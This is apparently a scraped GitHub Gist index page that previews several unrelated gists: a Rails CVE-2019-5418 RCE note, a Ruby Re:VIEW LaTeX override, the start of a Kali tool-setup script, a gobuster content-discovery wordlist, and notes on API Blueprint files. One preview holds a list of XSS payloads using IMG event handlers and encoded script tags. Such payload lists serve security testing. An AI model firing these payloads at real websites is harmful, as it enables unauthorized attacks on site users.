- Remote Code Executionとして、Advisoryが更新された。
- https://groups.google.com/d/msg/rubyonrails-security/zRNVOUhKHrg/GmmcVXcmAAAJ
- Thanks to @sorah @tenderlove
Motoyasu Saburi motoyasu-saburi
mala
/ CVE-2019-5418_is_RCE.md
Last active
February 7, 2021 04:25
Rails の CVE-2019-5418 は RCE (Remote code execution) です
kmuto
/ review-ext.rb
Created
March 4, 2019 14:32
tt, code内の'をtextquotesingleの形にする(textttを書き換えるのはいろいろ大変らしいので…)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| module ReVIEW | |
| module LATEXBuilderOverride | |
| def inline_tt(s) | |
| super(s).gsub("'", '\textquotesingle ').sub(/(textquotesingle) }$/, '\1}') | |
| end | |
| def inline_code(s) | |
| super(s).gsub("'", '\textquotesingle ').sub(/(textquotesingle) }$/, '\1}') | |
| end | |
| end |
mgeeky
/ prepare-kali.sh
Last active
September 28, 2023 17:58
A script that prepares Kali by collecting many useful tools of trade in /root/tools directory, installing requirements, seting them up, preparing .bashrc etc.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Well, entire Kali installation assume that we are normally working as root on our Kali. | |
| # I know that assumption sucks to its root, but I wanted to avoid every "permission denied" issue and I was too lazy | |
| # to get it done properly as a non-root. | |
| if [ $EUID -ne 0 ]; then | |
| echo "This script must be run as root." | |
| exit 1 | |
| fi |
jhaddix
/ content_discovery_all.txt
Created
May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ | |
| --- |
atsunoda
/ crlfi_via_path_of_request-uri.md
Last active
September 2, 2022 22:32
Request-URIのパスからのCRLFインジェクション
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
zdne
/ gist:5f8295642af18aff27ec
Created
June 17, 2015 10:47
Working with multiple API Blueprint files
This document describes 4 different solutions to work APIs that consist of multiple blueprint files. Every of this solution work with all Apiary.io features but editing. To edit a blueprint you have to do it outside of Apiary as Apiary editor does not support working with multiple files. In other words if you are using one of the solutions below avoid editing the blueprint in Apiary.
Hercule is a CLI tool written in Node.js – available as an NPM package. It uses markdown referencing and linking syntax to transclude other files into a blueprint file. This solution is universal and would work with any Markdown files not just API Blueprint.
The major benefit – unlike any other solutions here – is also that the references are rendered as HTML links in any Markdown editor so the result is HTML that can be browsed!